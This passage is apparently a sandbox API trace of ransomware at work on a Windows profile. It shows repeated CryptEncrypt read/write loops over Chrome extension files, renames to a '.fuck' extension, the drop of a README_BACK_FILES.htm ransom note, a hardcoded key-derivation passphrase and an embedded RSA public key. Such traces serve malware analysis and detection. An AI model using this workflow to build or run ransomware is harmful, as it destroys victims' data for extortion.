lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.218] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.219] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.219] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.219] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.219] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.219] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.219] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.220] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.221] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.221] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.221] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.221] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.221] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x23d, lpOverlapped=0x0) returned 1 [0264.221] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x23d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x240) returned 1 [0264.221] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x240, lpOverlapped=0x0) returned 1 [0264.221] CloseHandle (hObject=0x5d60) returned 1 [0264.221] CloseHandle (hObject=0x5d5c) returned 1 [0264.222] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), bFailIfExists=0) returned 1 [0264.224] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json", dwFileAttributes=0x0) returned 1 [0264.225] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.gsg")) returned 1 [0264.226] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.fuck")) returned 1 [0264.227] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.227] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.227] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.227] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.227] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.227] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\readme_back_files.htm")) returned 0xffffffff [0264.227] AreFileApisANSI () returned 1 [0264.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.227] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.228] GetFileType (hFile=0x5d64) returned 0x1 [0264.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.229] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.229] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0264.230] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.230] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.230] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.230] GetLastError () returned 0x0 [0264.230] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json")) returned 0x20 [0264.230] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json", dwFileAttributes=0x80) returned 1 [0264.231] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.232] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.233] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.233] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.235] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.235] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.235] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.235] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.235] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.235] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.235] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e763a8) returned 1 [0264.236] CryptImportPublicKeyInfo (in: hCryptProv=0x2e763a8, dwCertEncodingType=0x1, pInfo=0x2eae600*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae630*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae638*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ef80) returned 1 [0264.236] CryptEncrypt (in: hKey=0x2e7ef80, hHash=0x0, 